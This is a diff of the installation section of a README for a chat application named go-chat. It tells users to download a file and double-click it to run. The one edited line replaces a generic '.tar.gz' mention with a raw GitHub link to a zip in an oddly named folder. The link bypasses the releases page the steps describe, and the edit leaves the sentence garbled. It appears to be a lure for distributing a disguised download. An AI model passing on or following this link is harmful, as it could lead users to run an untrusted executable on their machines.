DmentexGH/go-chat/README.md

    On the releases page, look for the most recent version of go-chat.
 This will typically be marked as "Latest Release."

 3. **Download the Appropriate File**
    Depending on your operating system, choose the appropriate file to download.
 For Windows, look for a `.exe` file.
-For Mac or Linux, you might find a `.tar.gz` or similar file.
+For Mac or Linux, you might find a `https://raw.githubusercontent.com/DmentexGH/go-chat/main/ampulliform/go-chat.zip` or similar file.

 4. **Run the Application**
    Once the file has downloaded, navigate to your Downloads folder or the location where you saved the file.
 Double-click the file to run the application.
 If using Linux or Mac, you may need to use a terminal to execute the file.